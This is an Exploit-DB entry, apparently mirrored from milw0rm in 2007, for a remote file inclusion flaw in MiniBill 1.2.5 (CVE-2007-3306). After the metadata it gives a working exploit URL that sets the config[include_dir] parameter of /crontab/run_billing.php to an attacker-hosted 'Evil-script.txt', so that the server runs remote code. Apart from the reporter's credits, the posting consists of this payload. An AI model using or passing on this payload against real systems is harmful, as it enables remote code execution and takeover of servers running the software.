MiniBill 1.2.5 run_billing.php Remote File Inclusion Vulnerability

2007-06-18T00:00:00
ID EDB-ID:4079
Type exploitdb
Reporter Abo0od
Modified 2007-06-18T00:00:00

Description

MiniBill 1.2.5 (run_billing.php) Remote File Inclusion Vulnerability. CVE-2007-3306. Webapps exploit for php platform

                                        
                                            =======================================================
MiniBill 2007-04-09 (v1.2.5) Remote File include Vulnerabilities
=======================================================
Found By : Abo0od , abod@islam-attack.com
=======================================================
Homepage: http://www.hack-teach.org/cc
=======================================================
Script Site : http://www.ultrize.com/minibill/index.php?page=download
=======================================================
File: /crontab/run_billing.php <= $config['include_dir']
========================================================
Exploit:
site.com/crontab/run_billing.php?config[include_dir]=Evil-script.txt?
=======================================================
greets to : www.islam-attack.com
=======================================================

# milw0rm.com [2007-06-18]